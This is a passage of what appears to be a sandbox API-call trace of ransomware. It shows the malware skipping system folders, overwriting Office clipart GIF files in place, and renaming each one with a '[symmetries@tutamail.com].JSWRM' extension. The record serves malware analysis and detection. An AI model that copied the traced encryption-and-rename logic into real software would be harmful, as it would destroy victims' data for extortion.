| out: hHeap=0x1e0000) returned 1 [0099.625] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01746_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01746_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01746_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01746_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0099.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0099.626] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01747_.GIF", cAlternateFileName="")) returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2=".") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="..") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="...") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="windows") returned -1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="recovery") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="perflogs") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="documents and settings") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="system volume information") returned 1 [0099.626] lstrcmpiW (lpString1="WB01747_.GIF", lpString2="msocache") returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01747_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.626] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01747_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01747_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.626] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.626] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01747_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01747_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01747_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.627] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0099.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.627] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.627] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0099.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01747_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01747_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.627] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=903) returned 1 [0099.627] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.628] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x380) returned 0x20e550 [0099.628] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x380, lpOverlapped=0x0) returned 1 [0099.629] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.629] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x380, lpOverlapped=0x0) returned 1 [0099.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0099.629] CloseHandle (hObject=0x314) returned 1 [0099.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.629] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0099.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.629] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0099.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0099.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0099.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01747_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01747_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01747_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01747_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.631] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01748_.GIF", cAlternateFileName="")) returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2=".") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="..") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="...") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="windows") returned -1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="recovery") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="perflogs") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="documents and settings") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="system volume information") returned 1 [0099.631] lstrcmpiW (lpString1="WB01748_.GIF", lpString2="msocache") returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01748_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01748_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01748_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01748_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01748_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01748_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.631] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.631] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.631] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01748_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01748_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.632] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=727) returned 1 [0099.632] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d0) returned 0x20b1f8 [0099.632] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2d0, lpOverlapped=0x0) returned 1 [0099.633] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.633] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2d0, lpOverlapped=0x0) returned 1 [0099.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.634] CloseHandle (hObject=0x314) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0099.634] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0099.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0099.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0099.634] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.634] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01748_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01748_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01748_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01748_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0099.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.635] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01749_.GIF", cAlternateFileName="")) returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2=".") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="..") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="...") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="windows") returned -1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="recovery") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="perflogs") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="documents and settings") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="system volume information") returned 1 [0099.635] lstrcmpiW (lpString1="WB01749_.GIF", lpString2="msocache") returned 1 [0099.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0099.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01749_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01749_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01749_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01749_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01749_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01749_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0099.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0099.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0099.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01749_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01749_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.636] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=948) returned 1 [0099.636] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b0) returned 0x230a00 [0099.636] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x3b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x3b0, lpOverlapped=0x0) returned 1 [0099.638] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.638] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x3b0, lpOverlapped=0x0) returned 1 [0099.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0099.638] CloseHandle (hObject=0x314) returned 1 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0099.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0099.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0099.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0099.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.639] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01749_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01749_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01749_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01749_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0099.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0099.639] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0099.639] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01750_.GIF", cAlternateFileName="")) returned 1 [0099.639] lstrcmpiW (lpString1="WB01750_.GIF", lpString2=".") returned 1 [0099.639] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="..") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="...") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="windows") returned -1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="recovery") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="perflogs") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="documents and settings") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.640] lstrcmpiW (lpString1="WB01750_.GIF", lpString2="system volume information") returned 1 [0099.640] lstrcmpiW 